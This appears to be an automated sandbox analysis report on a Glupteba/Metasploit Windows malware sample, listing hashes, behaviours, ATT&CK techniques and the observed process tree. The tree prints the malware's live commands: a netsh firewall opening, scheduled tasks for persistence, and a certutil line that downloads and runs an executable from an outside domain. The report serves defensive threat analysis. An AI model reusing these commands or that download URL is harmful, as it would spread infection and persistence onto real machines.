Analysis

  • max time kernel
    153s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-01-2023 19:09

General

  • Target

    feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459.exe

  • Size

    3.8MB

  • MD5

    b11817fbd44543e6f2a09fd0d6e600d3

  • SHA1

    a200060d888da8b8e49859be8ec84fb8cd957d67

  • SHA256

    feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459

  • SHA512

    d47db2d6a2bb036baa3ea9435a26bec04f564fc2a7584de805400ec2de9db92560c8b2b143413b641522ddd42b729cf43353188bccdf4cfaa50c00f79034eb0d

  • SSDEEP

    98304:7SvIAqkXrJWR+K9tPp+qjvtmlb/2mU8u:ulrJI9tBRtmJ/xu

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 7 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459.exe
    "C:\Users\Admin\AppData\Local\Temp\feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2652
    • C:\Users\Admin\AppData\Local\Temp\feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459.exe
      "C:\Users\Admin\AppData\Local\Temp\feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:5056
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4832
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:3680
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1184
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1680
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:4124
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:216
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2312
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4888

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    b11817fbd44543e6f2a09fd0d6e600d3

    SHA1

    a200060d888da8b8e49859be8ec84fb8cd957d67

    SHA256

    feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459

    SHA512

    d47db2d6a2bb036baa3ea9435a26bec04f564fc2a7584de805400ec2de9db92560c8b2b143413b641522ddd42b729cf43353188bccdf4cfaa50c00f79034eb0d

  • C:\Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    b11817fbd44543e6f2a09fd0d6e600d3

    SHA1

    a200060d888da8b8e49859be8ec84fb8cd957d67

    SHA256

    feef25c4ba903369e877ec905261c71ce44e2f4b2c0b394fb38464b8a16e8459

    SHA512

    d47db2d6a2bb036baa3ea9435a26bec04f564fc2a7584de805400ec2de9db92560c8b2b143413b641522ddd42b729cf43353188bccdf4cfaa50c00f79034eb0d

  • memory/216-149-0x0000000000000000-mapping.dmp
  • memory/1184-141-0x0000000000000000-mapping.dmp
  • memory/1184-152-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/1184-146-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/1184-145-0x0000000001600000-0x00000000019A8000-memory.dmp
    Filesize

    3.7MB

  • memory/1680-147-0x0000000000000000-mapping.dmp
  • memory/2312-151-0x0000000000000000-mapping.dmp
  • memory/2652-136-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/2652-132-0x000000000117D000-0x0000000001525000-memory.dmp
    Filesize

    3.7MB

  • memory/2652-134-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/2652-133-0x0000000001530000-0x0000000001D34000-memory.dmp
    Filesize

    8.0MB

  • memory/3680-138-0x0000000000000000-mapping.dmp
  • memory/4124-148-0x0000000000000000-mapping.dmp
  • memory/4832-137-0x0000000000000000-mapping.dmp
  • memory/5056-140-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/5056-139-0x0000000001266000-0x000000000160E000-memory.dmp
    Filesize

    3.7MB

  • memory/5056-144-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/5056-135-0x0000000000000000-mapping.dmp